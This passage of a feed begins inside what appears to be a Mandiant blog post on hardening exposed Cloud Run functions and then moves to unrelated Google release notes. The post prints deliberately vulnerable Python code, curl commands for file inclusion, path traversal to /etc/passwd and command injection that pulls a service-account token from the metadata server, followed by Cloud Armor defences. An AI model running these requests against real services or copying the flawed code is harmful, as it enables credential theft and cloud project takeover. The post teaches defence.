&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 1: Vulnerable Python/Flask function accepting unvalidated user input to open files&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This vulnerability allows an attacker to request sensitive files from the Cloud Run instance by using &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;curl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to send a POST request via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;file&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; parameter:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -X POST https://cloudrun01-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d '{"file": "main.py"}'&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 2: curl POST request targeting the file parameter&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The response provides the complete &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;main.py&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; source code. An attacker can analyze the code for:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hardcoded secrets such as API keys, database credentials, or authentication tokens&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Business logic flaws and additional injection points&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Internal service endpoints and architecture details&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Import statements revealing the technology stack and potential CVE exposure&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Additionally, attackers can leverage standard &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;../&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; directory traversal sequences to retrieve sensitive system files:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -X POST https://cloudrun01-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d '{"file": "../../../etc/passwd"}'&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 3: curl POST request leveraging directory traversal sequences&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An LFI vulnerability allows an attacker to retrieve and fuzz various files directly from the container. Key examples include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;requirements.txt, package.json, go.mod&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Used to identify installed packages and versions with known vulnerabilities.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;env&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files: Frequently contain sensitive environment variables or hard coded secrets.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Application configuration files: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;May contain database credentials, API keys, or service endpoints if not securely managed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/etc/passwd, /proc/self/environ&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;: Contains user information, environment variables.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Application logs: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;may contain auth tokens or PII data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Best Practice:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Never store secrets or credentials within the source code or local container files. Utilize a dedicated secrets management solution, such as Secret Manager.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Code Execution/Command Injection&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the following scenario, a Python function uses shell execution methods with unsanitized user input, allowing an attacker to execute arbitrary commands.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;import functions_framework
import subprocess


@functions_framework.http
def hello_http(request):
  request_json = request.get_json(silent=True)
  request_args = request.args
  if request_json and 'input' in request_json:
      input = request_json['input']
  elif request_args and 'input' in request_args:
      input = request_args['input']
  result = subprocess.run(input, shell=True,capture_output=True, text=True)
  return format(result)&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4: Python function utilizing shell execution with unsanitized user input&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This allows an attacker to execute a subsequent curl request targeting the GCP metadata service to retrieve the service account’s bearer token. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The following request extracts the service account's OAuth 2.0 bearer token, which remains valid for 1 hour:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -X POST https://cloudrun02-abc.europe-west3.run.app/ -H "Content-Type: application/json" -d "{\"input\": \"curl 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'\"}"&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 5:&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Extraction of a GCP service account bearer token via a curl request&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once obtained, an attacker can use it on an attacker-controlled system to execute Google Cloud CLI commands. For example the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;CLOUDSDK_AUTH_ACCESS_TOKEN&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; environment variable can be set using the stolen bearer token.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;export CLOUDSDK_AUTH_ACCESS_TOKEN=”obtain bearer token”&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 6: Defining CLOUDSDK_AUTH_ACCESS_TOKEN environment variable&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Attackers can then leverage Google Cloud Cloud CLI within the security context of the Cloud Run Compute service account. If deployed without best practices and thoughtful configuration controls, for example, if the  Cloud Run service runs as the default compute service account with Editor permissions, this would be equivalent to a full GCP project takeover, and allow the attacker to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read/write/delete most GCP resources&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy new services and modify existing configurations&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Access secrets and encryption keys&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltrate data across all accessible storage systems&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Establish persistent backdoors through new service accounts or SSH keys.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Hardening Recommendations&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant recommends that organizations implement parallel approaches for effective serverless security:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secure Software Development Lifecycle (S-SDLC): &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;integrate security scanning, code review, least-privilege IAM into CI/CD pipelines before deployment and integrate continuous security testing; &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Vibe Coding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Mandiant recommends multi-layered security enforcement for AI-generated code or "vibe coding." Organizations should isolate AI experimentation within dedicated sandbox environments and enforce strict data egress controls to protect production systems and internal data. Furthermore, development environments should be restricted to approved IDEs with human-in-the-loop capabilities, utilizing only verified plugins operating under least privilege to mitigate supply chain vulnerabilities. Finally, organizations must ensure this AI-generated software follows Secure Software Development Lifecycle (S-SDLC) controls while establishing clear internal guidelines regarding permitted use cases. Comprehensive security fundamentals for vibe coding are documented in detail within the &lt;/span&gt;&lt;a href="https://www.wiz.io/academy/ai-security/vibe-coding-security" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz Vibe Coding Security Fundamentals blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Compensating Runtime Controls: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Implement the following defense-in-depth measures to limit and contain compromise even when application vulnerabilities exist;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Segregate Public Services&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Host public-facing Cloud Run services consumed by untrusted external entities in a dedicated, isolated Google Cloud project. This ensures a compromise does not provide an immediate path to critical internal resources. The implementation of this 'Service Project' model is beyond the scope of this post; however, it is documented in detail within the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/architecture/blueprints/serverless-blueprint"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;secured serverless architecture blueprint&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Identity and Access Management (IAM)&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant recommends using a custom service account for service authentication rather than the default Compute Engine service account, following the principle of least privilege. Grant only the specific permissions necessary for the Cloud Run function to operate, for example:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Storage Bucket Access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; If the service only requires read access to objects from a Cloud Storage bucket, grant the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Storage Object Viewer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/storage.objectViewer&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) role restricted to that specific bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secret Manager Access:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;  If the service requires access to secrets, grant the&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; Secret Manager Secret Accessor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;roles/secretmanager.secretAccessor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) role only to the individual secrets required. For further details on secret access from Cloud Run, refer to the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/run/docs/configuring/services/secrets#required_roles"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GCP documentation on configuring secrets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Layer 7 Application Load Balancer (ALB) Architecture&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Restrict ingress traffic for serverless functions to internal only and use an external Layer 7 ALB to manage internet exposure. This provides:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized Traffic Management:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Granular control over headers and SSL policies.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud Armor Integration:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Web Application Firewall (WAF) support to harden applications against vulnerabilities such as Local/Remote File Inclusion (LFI/RFI) and Server-Side Request Forgery (SSRF).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Traffic Shaping: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Implementation of rate limits and request limitations to prevent abuse.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced Visibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Robust logging and log-forwarding capabilities for security monitoring.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity-Aware Proxy (IAP):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; integration support for scenarios requiring specific identity-based authentication for internal users.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Web Application Firewall (WAF) &lt;span style="vertical-align: baseline;"&gt;—&lt;/span&gt; Cloud Armor&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/security/products/armor"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Armor&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides WAF protections that can be integrated with the Load Balancer to filter malicious traffic. The following examples demonstrate how to configure Cloud Armor security policies to block the specific local file inclusions, remote code execution and traversal attacks previously outlined.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Local File Inclusion&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;lfi-v33-stable&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; preconfigured WAF rules can block common local file inclusion attacks (&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/armor/docs/waf-rules#local_file_inclusion_lfi"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;local file inclusion reference&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;evaluatePreconfiguredWaf('lfi-v33-stable', {'sensitivity': 3})&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 7: Cloud Armor lfi-v33-stable WAF rule configuration&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Blocking a path traversal request &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;../../../etc/passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; resulting in a 403 forbidden:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -X POST https://exampleabc01.com -H "Content-Type: application/json" -d '{"file": "../../../etc/passwd}'
&amp;lt;!doctype html&amp;gt;&amp;lt;meta charset="utf-8"&amp;gt;&amp;lt;meta name=viewport content="width=device-width, initial-scale=1"&amp;gt;&amp;lt;title&amp;gt;403&amp;lt;/title&amp;gt;403 Forbidden&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 8: Verification of Cloud Armor blocking path traversal request, resulting in a 403 forbidden&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Code Execution&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;rce-v33-stable&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; preconfigured WAF rules can block remote code execution attempts (&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/armor/docs/waf-rules#remote_code_execution_rce"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;remote code execution reference&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;evaluatePreconfiguredWaf('rce-v33-stable', {'sensitivity': 3})&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 9: Cloud Armor rce-v33-stable WAF rule configuration&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Blocking the remote code execution request from the previous example results in a 403 forbidden:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -X POST https://exampleabc01.com -H "Contencurl -X POST https://exampleabc01.com -H "Content-Type: application/json" -d "{\"input\": \"curl 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'\"}"
&amp;lt;!doctype html&amp;gt;&amp;lt;meta charset="utf-8"&amp;gt;&amp;lt;meta name=viewport content="width=device-width, initial-scale=1"&amp;gt;&amp;lt;title&amp;gt;403&amp;lt;/title&amp;gt;403 Forbidden&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 10: Verification of Cloud Armor blocking Remote Code execution, resulting in a 403 forbidden&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Serverless Architecture Controls&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hardening Cloud Run services is only one part of a secure architecture. Because these services often connect to other Google Cloud resources, a single compromise can expose additional services. Implementing defense-in-depth is critical. Specifically, when using direct VPC egress or VPC Access connectors, use VPC Service Controls to restrict lateral movement and exfiltration through granular access policies.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Secure Software Development Lifecycle (S-SDLC)&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the previously outlined hardening strategies are critical, the ideal standard remains the proactive identification of vulnerabilities during the initial development stages. A deep dive into "Shift-Left" security is beyond the scope of this analysis, which focuses on mitigating risks within existing code. However, a Secure Software Development Lifecycle (S-SDLC) remains a fundamental principle. Robust code validation and continuous security testing are essential to neutralize threats before serverless functions are published externally.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Run Threat Detection&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beyond the hardening recommendations outlined in this post, &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/security-command-center"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Security Command Center (SCC)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides built-in services to detect control plane attacks against Cloud Run resources. These include detectors for credential access, reconnaissance, and the execution of scripts or reverse shells. The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/security-command-center/docs/cloud-run-threat-detection-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Run Threat Detection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; service is available for Premium and Enterprise tiers.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Serverless applications drive agility and rapid business value. While "vibe-coding" has made it easier than ever to deploy code, this breakneck speed demands that teams integrate security early in the development lifecycle, move beyond default configurations, and prioritize a defense-in-depth strategy centered on identity and architecture. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This analysis would not have been possible without the assistance of Ischa Rijff, Phil Pearce, and Juraj Sucik.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/exposed-cloud-functions-harden" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-15T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-firmie/jak-projektujemy-pomocne-narzedzia-ai-z-mysla-o-bezpieczenstwie-mlodych-uzytkownikow</id>
    <title>Jak projektujemy pomocne narzędzia AI z myślą o bezpieczeństwie młodych użytkowników</title>
    <updated>2026-07-15T14:00:00+00:00</updated>
    <content type="html">Wektorowa grafika z logo Gemini w centrum, połączonym liniami z różnymi elementami cyfrowymi i ikoną tarczy ochronnej, utrzymana w minimalistycznym stylu.</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-firmie/jak-projektujemy-pomocne-narzedzia-ai-z-mysla-o-bezpieczenstwie-mlodych-uzytkownikow" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-07-15T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_15_2026</id>
    <title>Workspace Release Notes — July 15, 2026</title>
    <updated>2026-07-15T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google Drive API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available&lt;/strong&gt;: The &lt;a href="https://developers.google.com/workspace/drive/api/reference/rest/v3/approvals#filecontentchangebehavior"&gt;&lt;code&gt;fileContentChangeBehavior&lt;/code&gt;&lt;/a&gt;
field on the
&lt;a href="https://developers.google.com/workspace/drive/api/reference/rest/v3/approvals"&gt;&lt;code&gt;approvals&lt;/code&gt;&lt;/a&gt;
resource is now generally available.&lt;/p&gt;
&lt;p&gt;This field allows you to determine the behavior of an approval when the file
content is changed while the approval status is &lt;code&gt;IN_PROGRESS&lt;/code&gt;. You can set this
field through the
&lt;a href="https://developers.google.com/workspace/drive/api/reference/rest/v3/approvals#start"&gt;&lt;code&gt;start&lt;/code&gt;&lt;/a&gt;
method on the &lt;code&gt;approvals&lt;/code&gt; resource.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Workspace Events API&lt;/h2&gt;
&lt;strong class="release-note-product-version-title"&gt;v1beta&lt;/strong&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Developer Preview:&lt;/strong&gt; Subscriptions to all Google Chat events in a Google Workspace organization (customer-level subscriptions) are now available as part of the &lt;a href="https://developers.google.com/workspace/preview"&gt;Developer Preview Program&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Using customer-level subscriptions, Google Chat apps can monitor space and user events across an entire Google Workspace organization without the app being a member of every space.&lt;/p&gt;
&lt;p&gt;Customer-level subscriptions support the following new authorization scopes (requiring service account configuration and administrator approval):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;https://www.googleapis.com/auth/chat.app.all.spaces.readonly&lt;/code&gt;: To see space metadata.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://www.googleapis.com/auth/chat.app.all.memberships.readonly&lt;/code&gt;: To see all space memberships.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://www.googleapis.com/auth/chat.app.all.messages.readonly&lt;/code&gt;: To see all messages and reactions.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;https://www.googleapis.com/auth/chat.app.all.users.readstate.readonly&lt;/code&gt;: To see read states of all users.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To learn more, see &lt;a href="https://developers.google.com/workspace/events/guides/create-subscription#customer-subscription"&gt;Subscribe to all Google Chat events in a Workspace organization&lt;/a&gt; and &lt;a href="https://developers.google.com/workspace/events/guides/events-chat#customer-limitations"&gt;Customer subscription limitations and delivery behaviors&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#July_15_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-15T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_15_2026</id>
    <title>Cloud Release Notes — July 15, 2026</title>
    <updated>2026-07-15T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Apigee hybrid&lt;/h2&gt;
